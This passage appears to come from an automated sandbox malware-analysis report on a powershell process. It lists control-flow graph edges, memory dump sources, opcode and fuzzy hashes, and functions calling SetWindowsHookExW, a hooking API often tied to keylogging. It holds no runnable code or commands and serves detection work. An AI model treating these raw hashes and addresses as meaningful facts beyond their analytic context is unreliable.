                                                                                      control_flow_graph 328 7ff887da387c-7ff887da38c7 330 7ff887da39da-7ff887da3a0d 328->330 331 7ff887da38cd-7ff887da38d7 328->331 339 7ff887da3a0f 330->339 332 7ff887da38f3-7ff887da3900 331->332 333 7ff887da38d9-7ff887da38f1 331->333 340 7ff887da3902-7ff887da3905 332->340 341 7ff887da397b-7ff887da3985 332->341 333->332 342 7ff887da3a11-7ff887da3a2c 339->342 343 7ff887da3a35-7ff887da3a89 339->343 340->341 344 7ff887da3907-7ff887da390f 340->344 345 7ff887da3994-7ff887da39d7 341->345 346 7ff887da3987-7ff887da3993 341->346 342->339 371 7ff887da3a8b 343->371 372 7ff887da3a8c-7ff887da3a97 343->372 344->330 348 7ff887da3915-7ff887da391f 344->348 345->330 352 7ff887da3921-7ff887da3936 348->352 353 7ff887da3938-7ff887da393c 348->353 352->353 353->341 357 7ff887da393e-7ff887da3941 353->357 357->341 359 7ff887da3943-7ff887da3944 357->359 362 7ff887da394b-7ff887da3954 359->362 363 7ff887da3956-7ff887da3963 362->363 364 7ff887da396d-7ff887da397a 362->364 363->364 368 7ff887da3965-7ff887da396b 363->368 368->364 371->372 373 7ff887da3a9d 372->373 374 7ff887da3aa0-7ff887da3ab3 373->374 375 7ff887da3a9f 373->375 374->373 376 7ff887da3ab5-7ff887da3b3a 374->376 375->374 380 7ff887da3b40-7ff887da3b4a 376->380 381 7ff887da3c82-7ff887da3d08 376->381 382 7ff887da3b63-7ff887da3b68 380->382 383 7ff887da3b4c-7ff887da3b61 380->383 415 7ff887da3d0a-7ff887da3d10 381->415 384 7ff887da3c22-7ff887da3c2c 382->384 385 7ff887da3b6e-7ff887da3b71 382->385 383->382 390 7ff887da3c3d-7ff887da3c7f 384->390 391 7ff887da3c2e-7ff887da3c3c 384->391 388 7ff887da3b73-7ff887da3b82 385->388 389 7ff887da3bb6 385->389 388->381 401 7ff887da3b88-7ff887da3b92 388->401 395 7ff887da3bb8-7ff887da3bba 389->395 390->381 395->384 397 7ff887da3bbc-7ff887da3bc2 395->397 398 7ff887da3be1-7ff887da3bf4 397->398 399 7ff887da3bc4-7ff887da3bdf 397->399 411 7ff887da3bf6-7ff887da3c03 398->411 412 7ff887da3c0d-7ff887da3c21 398->412 399->398 404 7ff887da3b94-7ff887da3ba4 401->404 405 7ff887da3bab-7ff887da3bb4 401->405 413 7ff887da3ba7-7ff887da3ba9 404->413 414 7ff887da3ba6 404->414 405->395 411->412 419 7ff887da3c05-7ff887da3c0b 411->419 413->405 414->413 415->415 416 7ff887da3d12 415->416 418 7ff887da3d14-7ff887da3d1a 416->418 418->418 420 7ff887da3d1c-7ff887da3d4b 418->420 419->412
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.2823175526.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: bJ$ bJ$07Xo
                                                                                      • API String ID: 0-3804966415
                                                                                      • Opcode ID: 7c266dfff1c13fe1792dfc4262eb885bf1f6151a8973d7179502f263312f4d29
                                                                                      • Instruction ID: f112218bd71ecb67b77ff59bb205fd4bb0284f993b49c2ebeec4ff2298ca9803
                                                                                      • Opcode Fuzzy Hash: 7c266dfff1c13fe1792dfc4262eb885bf1f6151a8973d7179502f263312f4d29
                                                                                      • Instruction Fuzzy Hash: 07023932E0CA8D5FE795DA6C98456B9BBF2FF55360B0402BAD44EC7197EA18EC05C341
                                                                                      Function 00007FF887CE0290 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 549 7ff887ce0290-7ff887ce04fd 556 7ff887ce0503-7ff887ce0510 549->556 557 7ff887ce0589-7ff887ce058d 549->557 558 7ff887ce0512-7ff887ce054f SetWindowsHookExW 556->558 557->558 560 7ff887ce0557-7ff887ce0588 558->560 561 7ff887ce0551 558->561 561->560
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.2822197315.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: HookWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2559412058-0
                                                                                      • Opcode ID: 0852b6f7ef2d72e6ced9f55759e7329a4e35b801d0096499730a79f89a57f99b
                                                                                      • Instruction ID: 0fee1e1db2141080041e39e9009cc006eafdf7085dafab9092f2e01994ba1a81
                                                                                      • Opcode Fuzzy Hash: 0852b6f7ef2d72e6ced9f55759e7329a4e35b801d0096499730a79f89a57f99b
                                                                                      • Instruction Fuzzy Hash: E541D47190CA488FDB09DBA8D8066B97BF1FF5A310F1401BFD049C3193DA686806C7C1
                                                                                      Function 00007FF887CE02B8 Relevance: 1.9, APIs: 1, Instructions: 360COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.2822197315.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: HookWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2559412058-0
                                                                                      • Opcode ID: b4bba91876f16bfff24c045e8ce19c8d797a644275f028bcb52fab93046b8627
                                                                                      • Instruction ID: efeeb376d5d7c0a626ace6956f2c701dae407dcecef7eaa08f59de581b39fa54
                                                                                      • Opcode Fuzzy Hash: b4bba91876f16bfff24c045e8ce19c8d797a644275f028bcb52fab93046b8627
                                                                                      • Instruction Fuzzy Hash: 2231B43191CA1C8FDB18EB9CD8466BDB7E1FB99311F10427EE00AD3252CA64A852CBC1
                                                                                      Function 00007FF887CE02BE Relevance: 1.9, APIs: 1, Instructions: 358COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 578 7ff887ce02be-7ff887ce04fd 582 7ff887ce0503-7ff887ce0510 578->582 583 7ff887ce0589-7ff887ce058d 578->583 584 7ff887ce0512-7ff887ce054f SetWindowsHookExW 582->584 583->584 586 7ff887ce0557-7ff887ce0588 584->586 587 7ff887ce0551 584->587 587->586
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.2822197315.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: HookWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2559412058-0
                                                                                      • Opcode ID: ba6c5c596e6e3b9c5c439506cb290fe2d97b6ee2fecf2e93b97dfd24228c2b30
                                                                                      • Instruction ID: 67d533b46f33ea8e5dfbe48c55bf2f6401684a0fc4e55b43855ab288e257ceeb
                                                                                      • Opcode Fuzzy Hash: ba6c5c596e6e3b9c5c439506cb290fe2d97b6ee2fecf2e93b97dfd24228c2b30
                                                                                      • Instruction Fuzzy Hash: 7531C63191CA1C8FDB18DB9CD8466BDB7E1FB99311F10427EE00AD3252CA64A812CBC1
                                                                                      Function 00007FF887CD97DA Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 590 7ff887cd97da-7ff887ce04fd 594 7ff887ce0503-7ff887ce0510 590->594 595 7ff887ce0589-7ff887ce058d 590->595 596 7ff887ce0512-7ff887ce054f SetWindowsHookExW 594->596 595->596 598 7ff887ce0557-7ff887ce0588 596->598 599 7ff887ce0551 596->599 599->598
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.2822197315.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_7ff887cd0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: HookWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2559412058-0
                                                                                      • Opcode ID: be885ce4325484e74f81d281a2635be8426312813212e4c230ac8ad20e7620c9
                                                                                      • Instruction ID: 6757164aa4745d18de0483a62a5632b3f0dd84564d71c11c9a61253f1cdb3aff
                                                                                      • Opcode Fuzzy Hash: be885ce4325484e74f81d281a2635be8426312813212e4c230ac8ad20e7620c9
                                                                                      • Instruction Fuzzy Hash: B031A531A1CA1C8FDB58EB9CD8466BDB7E1FB99311F10423EE05ED3251CA64A8528BC1
                                                                                      Function 00007FF887DA1694 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.2823175526.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: bJ
                                                                                      • API String ID: 0-3573994042
                                                                                      • Opcode ID: 945cba87435f54cc26b95fa3f0bda073a604190f770be3230f3155a54b137075
                                                                                      • Instruction ID: 1624ed8ef82cc7df8be127d3b727bcc08dab4365061b64fe1840281aa51f7a52
                                                                                      • Opcode Fuzzy Hash: 945cba87435f54cc26b95fa3f0bda073a604190f770be3230f3155a54b137075
                                                                                      • Instruction Fuzzy Hash: 93613532E4CA894FEBA5DA2C98546B9BBF1FF55290F0812BBC04EC7197ED199C05C381
                                                                                      Function 00007FF887DA41A1 Relevance: .1, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.2823175526.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 875d50d754dfddcc7d272b8fdebefb70375015836552408d1c38745099b3dd6a
                                                                                      • Instruction ID: e96e3e4a8b4eb208855fb92395e58ee3d8bd1b9f08b195a6158ab3b91c44899d
                                                                                      • Opcode Fuzzy Hash: 875d50d754dfddcc7d272b8fdebefb70375015836552408d1c38745099b3dd6a
                                                                                      • Instruction Fuzzy Hash: EE110432B0CB444FEB589A2CA8011BDB7E1FF86261B0802BFD08FC2493DA19A8168305
                                                                                      Function 00007FF887DA3933 Relevance: .0, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.2823175526.00007FF887DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_7ff887da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cbf2d4f096d76777efb4f84d25ea8eb9cde81e294fc2932ba06a847e49eb9083
                                                                                      • Instruction ID: f59f33bbe6c344dc91bc741a0b551605242a9be18c2a5d44d3f2dfca76a43e47
                                                                                      • Opcode Fuzzy Hash: cbf2d4f096d76777efb4f84d25ea8eb9cde81e294fc2932ba06a847e49eb9083
                                                                                      • Instruction Fuzzy Hash: 34F08223F4DE2E0EE6A5965C25147B9A1E2FF88760F440272D41ED318ADE189C158281